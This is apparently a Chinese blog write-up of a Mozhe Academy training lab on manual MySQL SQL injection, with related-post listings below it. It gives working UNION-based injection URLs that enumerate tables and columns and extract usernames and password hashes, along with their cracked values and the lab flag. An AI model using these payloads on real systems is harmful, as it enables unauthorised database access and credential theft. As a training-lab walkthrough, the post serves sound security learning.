墨者学院SQL手工注入漏洞测试(MySQL数据库)的wp

已于 2022-04-05 16:43:12 修改
阅读量2.2k 收藏
点赞数
分类专栏: ctf sql注入 文章标签: 网络安全
于 2022-04-05 16:35:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lppdlgg/article/details/123971743
版权

链接: https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe

1.判断是否存在爆破点:
http://124.70.64.48:46855/new_list.php?id=1dfddsvs
返回错误,id后的输入数据被处理,表示存在注入点

2.猜解列名数量(猜字段): order by x 错误与正常的过渡值
http://124.70.64.48:46855/new_list.php?id=1 order by 4

3.查找注入通道:
http://124.70.64.48:46855/new_list.php?id=-1%20union%20select%201,2,3,4
返回值为2,3(可注入通道)

4.查询数据库的用户名,版本,名字,系统:
user()                           root@localhost
version()                          5.7.22-0ubuntu0.16.04.1
database()                   mozhe_Discuz_StormGroup
@@version_compile_os  Linux

扩展:
数据库版本在5.0以上算高版本,采用information_schema有据查询,低版本采用暴力查询
原因:版本在5.0以上的数据库存在一个数据库名为information_schema存储有数据库名,表名,列名

5.查询数据库下的所有表名:
http://124.70.64.48:46855/new_list.php?id=-1%20union%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=%27mozhe_Discuz_StormGroup%27
结果:StormGroup_member,notice

6.查询StormGroup_member表名下的所有列名:
http://124.70.64.48:46855/new_list.php?id=-1%20union%20select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name=%27StormGroup_member%27
结果:id,name,password,status

7.查询StormGroup_member表名下的具体数据:
http://124.70.64.48:46855/new_list.php?id=-1%20union%20select%201,name,password,4%20from%20StormGroup_member%20limit%200,1
结果:mozhe     356f589a7df439f6f744ff19bb8092c0(解密得:dsan13)
http://124.70.64.48:46855/new_list.php?id=-1%20union%20select%201,name,password,4%20from%20StormGroup_member%20limit%201,1
结果;mozhe     0b3f116b287a258c0c75d8c5a3849fb3(解密得:844201)

8.尝试两个账户,得出flag
mozhe4f4b6c8f3a81a57fdb361d321d0

sas.saxion
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
墨者学院-SQL注入漏洞测试(HTTP头注入)
JimWu的博客
09-04 1277
SQL注入漏洞测试(HTTP头注入) 难易程度:★★ 题目类型:SQL注入 使用工具:FireFox浏览器、burpsuite 1.打开靶场,使用burpsuite访问网页,截包。 2.把包send to repeater,根据题目为host注入,把host改为or 1=1,报错,证明存在注入。 3.输入union select 1,2,3,4 查看回显位置。 4.输入union select...
墨者学院01 SQL手工注入漏洞测试(MySQL数据库)
weixin_42789937的博客
01-24 476
墨者学院01 SQL手工注入漏洞测试(MySQL数据库),小白友好的SQL实战~
墨者学院05 SQL手工注入漏洞测试(MySQL数据库-字符型)
weixin_42789937的博客
01-25 294
墨者学院05 SQL手工注入漏洞测试(MySQL数据库-字符型),看见SQL内心已经没什么波澜...
墨者学院04 SQL手工注入漏洞测试(Sql Server数据库)
weixin_42789937的博客
01-25 318
墨者学院04 SQL手工注入漏洞测试(Sql Server数据库),熟悉的配方,熟悉的味道~
墨者学院02 SQL手工注入漏洞测试(Access数据库)
weixin_42789937的博客
01-24 310
墨者学院02 SQL手工注入漏洞测试(Access数据库),是一个较为详细的WP~
墨者学院03 SQL注入漏洞测试(布尔盲注)
weixin_42789937的博客
01-24 399
墨者学院03 SQL注入漏洞测试(布尔盲注),脚本小子的SQL注入实战~
墨者学院MySQL--sql注入靶场
weixin_43803070的博客
07-08 1622
这几天做题的时候发现了一个靶场,先做了一个SQL注入,怎么说呢,这个靶场环境还可以,但是个人感觉最后的 key获取,有点脑洞,没有太大的实际意义背离了实际的初衷,不说了直接上wp: 首先找注入点: http://219.153.49.228:40084/new_list.php?id=1‘// id=1的时候返回正常,id=1’的时候返回错误,说明存在sql注入。 http://219.153...
墨者学院09 X-Forwarded-For注入漏洞实战
weixin_42789937的博客
02-10 565
墨者学院09 X-Forwarded-For注入漏洞实战,参考大佬wp,对于显错注入整理了手工sqlmap两种注入流程~
7.27 搭建sqlilabas+墨者学院第一次靶场通关
weixin_52240463的博客
07-27 595
1.用phpstudy2018 配置了第一个靶场 sqli-labs 一个印度的Sql注入练习 (感觉印度哥在Internet这方面还是挺牛逼的) phpstudy还挺人性化 至少运行时缺的东西都会提示你并且给你跳转网页 挺不错一软件 先学点注入后面当刷题网站吧 sqli-labs装在了虚拟机 怕之后在主机不会装留下装机过程 先从github上下载zip包 解压安装在php服务器下的WWW文件夹中!!! 并更改文件中 db_credit 下的用户名和密码信息 然后此步和网上教程不一样 网上教.
墨者靶场 post ,DB2,绕过登录,sql注入四关
07-22
### 墨者靶场 Post、DB2、绕过登录及SQL注入四关攻略 #### 一、前言 在网络安全领域,靶场是检验安全技术能力的重要平台之一。本次攻略将详细介绍墨者靶场中的Post、DB2、绕过登录及SQL注入四个挑战关卡的解决方法...
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
WebShell文件上传漏洞分析溯源
02-22
2. 渗透测试:通过渗透测试来检测Web应用程序是否存在文件上传漏洞。 3. 漏洞扫描:使用漏洞扫描工具来检测Web应用程序是否存在文件上传漏洞。 六、WebShell 文件上传漏洞的实践案例 在这个实践案例中,我们使用...
spring IOC实现(墨者革离)
12-12
在这个名为"spring_IOC实现(墨者革离)"的项目中,我们可以通过模拟城门叩问的编剧场景来理解这一概念。 首先,控制反转的基本思想是将对象的创建和依赖关系的管理从应用程序中分离出来,交给一个外部容器(在...
墨者未必黑.pdf
12-26
墨者未必黑.pdf
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8366
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
27.siamese连体网络小样本猫狗品种分类.zip
08-06
27.siamese连体网络小样本猫狗品种分类
C++试题库系统的设计与开发(源代码).zip
08-06
C++试题库系统的设计与开发,包含全量功能源码、配置教程,及相关文档说明,供大家学习使用!
20个二级指标报告年份数据集2003-2022年.xlsx
最新发布
08-06
详细介绍及样例数据:https://blog.csdn.net/T0620514/article/details/140968187
一个spring boot+uniapp的JAVA开源商城系统,前后端分离、 [ 微信 + 支付宝 + 百度 + 头条 ] 小程
08-06
【项目资源】:包含前端、后端、移动开发、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源,毕业设计等各种技术项目的源码。包括C++、Java、python、web、C#、EDA等项目的源码。 【适用人群】:适用于希望学习不同技术领域的初学者或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值